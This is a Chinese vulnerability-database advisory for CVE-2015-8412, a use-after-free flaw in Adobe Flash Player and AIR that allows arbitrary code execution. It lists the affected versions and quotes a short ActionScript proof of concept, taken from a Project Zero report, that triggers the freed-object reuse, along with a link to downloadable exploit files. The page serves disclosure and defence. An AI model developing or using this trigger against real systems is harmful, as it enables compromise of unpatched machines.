多款Adobe产品释放后重用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123161 漏洞类型 其他
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 CVE-2015-8412 CNNVD-ID CNNVD-201512-242
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/39042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-242
|漏洞详情
AdobeFlashPlayer、AdobeAIRSDK和AdobeAIRSDK&Compiler都是美国奥多比(Adobe)公司的产品。AdobeFlashPlayer是一款多媒体播放器产品;AdobeAIRSDK和AdobeAIRSDK&Compiler都是适用于AdobeAIR(一个跨操作系统的运行时环境)的标准开发工具包。多款Adobe产品中存在释放后重用漏洞。攻击者可利用该漏洞执行任意代码,控制受影响系统。以下产品及版本受到影响:基于Windows和Macintosh平台的AdobeFlashPlayerDesktopRuntime19.0.0.245及之前版本和AdobeFlashPlayerExtendedSupportRelease18.0.0.261及之前版本,基于Windows、Macintosh、Linux和ChromeOS平台的AdobeFlashPlayerforGoogleChrome19.0.0.245及之前版本,基于Windows10平台的AdobeFlashPlayerforMicrosoftEdgeandInternetExplorer1119.0.0.245及之前版本,基于Windows8.0和8.1平台的AdobeFlashPlayerforInternetExplorer10and1119.0.0.245及之前版本,基于Linux平台的AdobeFlashPlayerforLinux11.2.202.548及之前版本,基于Windows和Macintosh平台的AIRDesktopRuntime19.0.0.241及之前版本,基于Windows、Macintosh、Android和iOS平台的AIRSDK19.0.0.241及之前版本和AIRSDK&Compiler19.0.0.241及之前版本,基于Android平台的AIRforAndroid19.0.0.241及之前版本。
|漏洞EXP
Source: https://code.google.com/p/google-security-research/issues/detail?id=591

There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used. 

A minimal PoC follows:


this.createEmptyMovieClip("mc", 1);

mc.duplicateMovieClip( "mc",{valueOf : func});


function func(){
	
	trace("in func");
	mc.removeMovieClip();

        // Fix heap here

	return 5;
	
	}
	
	
A sample swf and fla are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39042.zip
|参考资料

来源:helpx.adobe.com
链接:https://helpx.adobe.com/security/products/flash-player/apsb15-32.html